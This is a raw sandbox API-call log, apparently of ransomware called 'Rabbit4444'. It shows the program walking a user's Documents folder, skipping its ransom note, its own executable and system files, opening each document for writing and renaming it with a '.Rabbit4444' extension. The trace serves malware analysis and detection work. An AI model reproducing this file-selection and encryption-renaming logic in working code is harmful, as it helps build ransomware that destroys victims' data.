(lpString1="docx", lpString2=".sys") returned 1 [0049.928] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\-fpJmWMI.docx" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\yao0uryzwssx3x\\-fpjmwmi.docx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.928] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.928] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14123916917) returned 1 [0049.928] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8960) returned 1 [0049.929] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0049.929] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0049.929] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2600, lpName=0x0) returned 0x298 [0049.929] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2600) returned 0x70000 [0049.929] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.929] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0049.929] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.929] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0049.929] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.930] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0049.930] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.930] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0049.930] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14124044381) returned 1 [0049.930] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0049.930] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0049.930] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.930] CloseHandle (hObject=0x298) returned 1 [0049.930] CloseHandle (hObject=0x278) returned 1 [0049.931] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\-fpJmWMI.docx.Rabbit4444") returned 78 [0049.931] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\-fpJmWMI.docx" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\yao0uryzwssx3x\\-fpjmwmi.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\-fpJmWMI.docx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\yao0uryzwssx3x\\-fpjmwmi.docx.rabbit4444"), dwFlags=0x1) returned 1 [0049.931] InterlockedExchangeAdd (in: Addend=0xff618, Value=8960 | out: Addend=0xff618) returned 24252160 [0049.931] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3727 [0049.931] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69bb1ce0, ftCreationTime.dwHighDateTime=0x1d4d131, ftLastAccessTime.dwLowDateTime=0x2577cc40, ftLastAccessTime.dwHighDateTime=0x1d4d5d7, ftLastWriteTime.dwLowDateTime=0x2577cc40, ftLastWriteTime.dwHighDateTime=0x1d4d5d7, nFileSizeHigh=0x0, nFileSizeLow=0x1696c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-JwUYt-2tOoXas.ods", cAlternateFileName="-JWUYT~1.ODS")) returned 1 [0049.931] lstrcmpiW (lpString1="-JwUYt-2tOoXas.ods", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.931] lstrcmpiW (lpString1="-JwUYt-2tOoXas.ods", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.931] lstrcmpiW (lpString1="-JwUYt-2tOoXas.ods", lpString2="Rabbit4444.exe") returned -1 [0049.931] lstrcmpiW (lpString1="-JwUYt-2tOoXas.ods", lpString2=".") returned 1 [0049.931] lstrcmpiW (lpString1="-JwUYt-2tOoXas.ods", lpString2="..") returned 1 [0049.931] lstrcmpiW (lpString1="-JwUYt-2tOoXas.ods", lpString2="windows") returned -1 [0049.931] lstrcmpiW (lpString1="-JwUYt-2tOoXas.ods", lpString2="bootmgr") returned 1 [0049.931] lstrcmpiW (lpString1="-JwUYt-2tOoXas.ods", lpString2="pagefile.sys") returned -1 [0049.931] lstrcmpiW (lpString1="-JwUYt-2tOoXas.ods", lpString2="boot") returned 1 [0049.932] lstrcmpiW (lpString1="-JwUYt-2tOoXas.ods", lpString2="ids.txt") returned 1 [0049.932] lstrcmpiW (lpString1="-JwUYt-2tOoXas.ods", lpString2="NTUSER.DAT") returned -1 [0049.932] lstrcpyW (in: lpString1=0x130eba4, lpString2="-JwUYt-2tOoXas.ods" | out: lpString1="-JwUYt-2tOoXas.ods") returned="-JwUYt-2tOoXas.ods" [0049.932] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\-JwUYt-2tOoXas.ods", dwFileAttributes=0x0) returned 1 [0049.932] lstrlenW (lpString="-JwUYt-2tOoXas.ods") returned 18 [0049.932] lstrlenW (lpString="Rabbit4444") returned 10 [0049.932] lstrcmpiW (lpString1="tOoXas.ods", lpString2="Rabbit4444") returned 1 [0049.932] lstrlenW (lpString=".dll") returned 4 [0049.932] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0049.932] lstrlenW (lpString=".lnk") returned 4 [0049.932] lstrcmpiW (lpString1=".ods", lpString2=".lnk") returned 1 [0049.932] lstrlenW (lpString=".ini") returned 4 [0049.932] lstrcmpiW (lpString1=".ods", lpString2=".ini") returned 1 [0049.932] lstrlenW (lpString=".sys") returned 4 [0049.932] lstrcmpiW (lpString1=".ods", lpString2=".sys") returned -1 [0049.932] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\-JwUYt-2tOoXas.ods" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\yao0uryzwssx3x\\-jwuyt-2tooxas.ods"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.932] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.932] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14124298118) returned 1 [0049.932] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=92524) returned 1 [0049.932] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0049.932] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0049.932] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16c70, lpName=0x0) returned 0x298 [0049.933] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16c70) returned 0x70000 [0049.935] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.935] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.935] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.935] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0049.935] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.935] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0049.935] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.935] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.935] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14124595504) returned 1 [0049.935] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0049.935] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0049.935] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.936] CloseHandle (hObject=0x298) returned 1 [0049.936] CloseHandle (hObject=0x278) returned 1 [0049.937] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\-JwUYt-2tOoXas.ods.Rabbit4444") returned 83 [0049.937] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\-JwUYt-2tOoXas.ods" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\yao0uryzwssx3x\\-jwuyt-2tooxas.ods"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\-JwUYt-2tOoXas.ods.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\yao0uryzwssx3x\\-jwuyt-2tooxas.ods.rabbit4444"), dwFlags=0x1) returned 1 [0049.937] InterlockedExchangeAdd (in: Addend=0xff618, Value=92528 | out: Addend=0xff618) returned 24261120 [0049.937] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3728 [0049.937] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe71550d1, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe71550d1, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe71550d1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.938] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.938] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.938] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb7b250, ftCreationTime.dwHighDateTime=0x1d4ccde, ftLastAccessTime.dwLowDateTime=0xfc42b630, ftLastAccessTime.dwHighDateTime=0x1d4d1a0, ftLastWriteTime.dwLowDateTime=0xfc42b630, ftLastWriteTime.dwHighDateTime=0x1d4d1a0, nFileSizeHigh=0x0, nFileSizeLow=0x18bdd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F _E.ods", cAlternateFileName="F_E~1.ODS")) returned 1 [0049.938] lstrcmpiW (lpString1="F _E.ods", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.938] lstrcmpiW (lpString1="F _E.ods", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.938] lstrcmpiW (lpString1="F _E.ods", lpString2="Rabbit4444.exe") returned -1 [0049.938] lstrcmpiW (lpString1="F _E.ods", lpString2=".") returned 1 [0049.938] lstrcmpiW (lpString1="F _E.ods", lpString2="..") returned 1 [0049.938] lstrcmpiW (lpString1="F _E.ods", lpString2="windows") returned -1 [0049.938] lstrcmpiW (lpString1="F _E.ods", lpString2="bootmgr") returned 1 [0049.938] lstrcmpiW (lpString1="F _E.ods", lpString2="pagefile.sys") returned -1 [0049.938] lstrcmpiW (lpString1="F _E.ods", lpString2="boot") returned 1 [0049.938] lstrcmpiW (lpString1="F _E.ods", lpString2="ids.txt") returned -1 [0049.938] lstrcmpiW (lpString1="F _E.ods", lpString2="NTUSER.DAT") returned -1 [0049.938] lstrcpyW (in: lpString1=0x130eba4, lpString2="F _E.ods" | out: lpString1="F _E.ods") returned="F _E.ods" [0049.938] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\F _E.ods", dwFileAttributes=0x0) returned 1 [0049.938] lstrlenW (lpString="F _E.ods") returned 8 [0049.938] lstrlenW (lpString="Rabbit4444") returned 10 [0049.938] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0049.938] lstrlenW (lpString=".dll") returned 4 [0049.938] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0049.938] lstrlenW (lpString=".lnk") returned 4 [0049.938] lstrcmpiW (lpString1=".ods", lpString2=".lnk") returned 1 [0049.938] lstrlenW (lpString=".ini") returned 4 [0049.938] lstrcmpiW (lpString1=".ods", lpString2=".ini") returned 1 [0049.938] lstrlenW (lpString=".sys") returned 4 [0049.938] lstrcmpiW (lpString1=".ods", lpString2=".sys") returned -1 [0049.938] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\F _E.ods" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\yao0uryzwssx3x\\f _e.ods"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.939] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.939] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14124931180) returned 1 [0049.939] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=101341) returned 1 [0049.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0049.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0049.939] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18ee0, lpName=0x0) returned 0x298 [0049.939] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18ee0) returned 0x70000 [0049.941] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.941] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.941] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.941] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0049.941] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.941] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0049.942] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.942] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.942] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14125237800) returned 1 [0049.942] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0049.942] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0049.942] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.943] CloseHandle (hObject=0x298) returned 1 [0049.943] CloseHandle (hObject=0x278) returned 1 [0049.943] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\F _E.ods.Rabbit4444") returned 73 [0049.943] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\F _E.ods" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\yao0uryzwssx3x\\f _e.ods"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\F _E.ods.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\yao0uryzwssx3x\\f _e.ods.rabbit4444"), dwFlags=0x1) returned 1 [0049.944] InterlockedExchangeAdd (in: Addend=0xff618, Value=101344 | out: Addend=0xff618) returned 24353648 [0049.944] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 3730 [0049.944] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d541a0, ftCreationTime.dwHighDateTime=0x1d4d3ee, ftLastAccessTime.dwLowDateTime=0x4c0a1710, ftLastAccessTime.dwHighDateTime=0x1d4d432, ftLastWriteTime.dwLowDateTime=0x4c0a1710, ftLastWriteTime.dwHighDateTime=0x1d4d432, nFileSizeHigh=0x0, nFileSizeLow=0xb44a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gFCS.odt", cAlternateFileName="")) returned 1 [0049.944] lstrcmpiW (lpString1="gFCS.odt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.944] lstrcmpiW (lpString1="gFCS.odt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.944] lstrcmpiW (lpString1="gFCS.odt", lpString2="Rabbit4444.exe") returned -1 [0049.944] lstrcmpiW (lpString1="gFCS.odt", lpString2=".") returned 1 [0049.944] lstrcmpiW (lpString1="gFCS.odt", lpString2="..") returned 1 [0049.944] lstrcmpiW (lpString1="gFCS.odt", lpString2="windows") returned -1 [0049.944] lstrcmpiW (lpString1="gFCS.odt", lpString2="bootmgr") returned 1 [0049.944] lstrcmpiW (lpString1="gFCS.odt", lpString2="pagefile.sys") returned -1 [0049.944] lstrcmpiW (lpString1="gFCS.odt", lpString2="boot") returned 1 [0049.944] lstrcmpiW (lpString1="gFCS.odt", lpString2="ids.txt") returned -1 [0049.944] lstrcmpiW (lpString1="gFCS.odt", lpString2="NTUSER.DAT") returned -1 [0049.944] lstrcpyW (in: lpString1=0x130eba4, lpString2="gFCS.odt" | out: lpString1="gFCS.odt") returned="gFCS.odt" [0049.944] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\gFCS.odt", dwFileAttributes=0x0) returned 1 [0049.944] lstrlenW (lpString="gFCS.odt") returned 8 [0049.944] lstrlenW (lpString="Rabbit4444") returned 10 [0049.945] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0049.945] lstrlenW (lpString=".dll") returned 4 [0049.945] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0049.945] lstrlenW (lpString=".lnk") returned 4 [0049.945] lstrcmpiW (lpString1=".odt", lpString2=".lnk") returned 1 [0049.945] lstrlenW (lpString=".ini") returned 4 [0049.945] lstrcmpiW (lpString1=".odt", lpString2=".ini") returned 1 [0049.945] lstrlenW (lpString=".sys") returned 4 [0049.945] lstrcmpiW (lpString1=".odt", lpString2=".sys") returned -1 [0049.945] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\gFCS.odt" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\yao0uryzwssx3x\\gfcs.odt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.945] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.945] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14125567151) returned 1 [0049.945] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=46154) returned 1 [0049.945] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0049.945] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0049.945] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb750, lpName=0x0) returned 0x298 [0049.945] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb750) returned 0x70000 [0049.946] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.947] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0049.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.947] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0049.947] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0049.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0049.947] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14125776059) returned 1 [0049.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0049.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0049.947] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.948] CloseHandle (hObject=0x298) returned 1 [0049.948] CloseHandle (hObject=0x278) returned 1 [0049.948] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\gFCS.odt.Rabbit4444") returned 73 [0049.948] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\gFCS.odt" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\yao0uryzwssx3x\\gfcs.odt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\gFCS.odt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\yao0uryzwssx3x\\gfcs.odt.rabbit4444"), dwFlags=0x1) returned 1 [0049.949] InterlockedExchangeAdd (in: Addend=0xff618, Value=46160 | out: Addend=0xff618) returned 24454992 [0049.949] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3733 [0049.949] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb98c2190, ftCreationTime.dwHighDateTime=0x1d4d4fd, ftLastAccessTime.dwLowDateTime=0x70d4dbb0, ftLastAccessTime.dwHighDateTime=0x1d4cc13, ftLastWriteTime.dwLowDateTime=0x70d4dbb0, ftLastWriteTime.dwHighDateTime=0x1d4cc13, nFileSizeHigh=0x0, nFileSizeLow=0x1620b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YwT0L2uHZ5 4t5VAQEl.odp", cAlternateFileName="YWT0L2~1.ODP")) returned 1 [0049.949] lstrcmpiW (lpString1="YwT0L2uHZ5 4t5VAQEl.odp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.949] lstrcmpiW (lpString1="YwT0L2uHZ5 4t5VAQEl.odp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.949] lstrcmpiW (lpString1="YwT0L2uHZ5 4t5VAQEl.odp", lpString2="Rabbit4444.exe") returned 1 [0049.949] lstrcmpiW (lpString1="YwT0L2uHZ5 4t5VAQEl.odp", lpString2=".") returned 1 [0049.949] lstrcmpiW (lpString1="YwT0L2uHZ5 4t5VAQEl.odp", lpString2="..") returned 1 [0049.949] lstrcmpiW (lpString1="YwT0L2uHZ5 4t5VAQEl.odp", lpString2="windows") returned 1 [0049.949] lstrcmpiW (lpString1="YwT0L2uHZ5 4t5VAQEl.odp", lpString2="bootmgr") returned 1 [0049.949] lstrcmpiW (lpString1="YwT0L2uHZ5 4t5VAQEl.odp", lpString2="pagefile.sys") returned 1 [0049.949] lstrcmpiW (lpString1="YwT0L2uHZ5 4t5VAQEl.odp", lpString2="boot") returned 1 [0049.949] lstrcmpiW (lpString1="YwT0L2uHZ5 4t5VAQEl.odp", lpString2="ids.txt") returned 1 [0049.949] lstrcmpiW (lpString1="YwT0L2uHZ5 4t5VAQEl.odp", lpString2="NTUSER.DAT") returned 1 [0049.949] lstrcpyW (in: lpString1=0x130eba4, lpString2="YwT0L2uHZ5 4t5VAQEl.odp" | out: lpString1="YwT0L2uHZ5 4t5VAQEl.odp") returned="YwT0L2uHZ5 4t5VAQEl.odp" [0049.949] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\YwT0L2uHZ5 4t5VAQEl.odp", dwFileAttributes=0x0) returned 1 [0049.949] lstrlenW (lpString="YwT0L2uHZ5 4t5VAQEl.odp") returned 23 [0049.949] lstrlenW (lpString="Rabbit4444") returned 10 [0049.949] lstrcmpiW (lpString1="5VAQEl.odp", lpString2="Rabbit4444") returned -1 [0049.949] lstrlenW (lpString=".dll") returned 4 [0049.949] lstrcmpiW (lpString1=".odp", lpString2=".dll") returned 1 [0049.949] lstrlenW (lpString=".lnk") returned 4 [0049.949] lstrcmpiW (lpString1=".odp", lpString2=".lnk") returned 1 [0049.950] lstrlenW (lpString=".ini") returned 4 [0049.950] lstrcmpiW (lpString1=".odp", lpString2=".ini") returned 1 [0049.950] lstrlenW (lpString=".sys") returned 4 [0049.950] lstrcmpiW (lpString1=".odp", lpString2=".sys") returned -1 [0049.950] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\YwT0L2uHZ5 4t5VAQEl.odp" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\yao0uryzwssx3x\\ywt0l2uhz5 4t5vaqel.odp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.950] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.950] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14126053929) returned 1 [0049.950] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=90635) returned 1 [0049.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 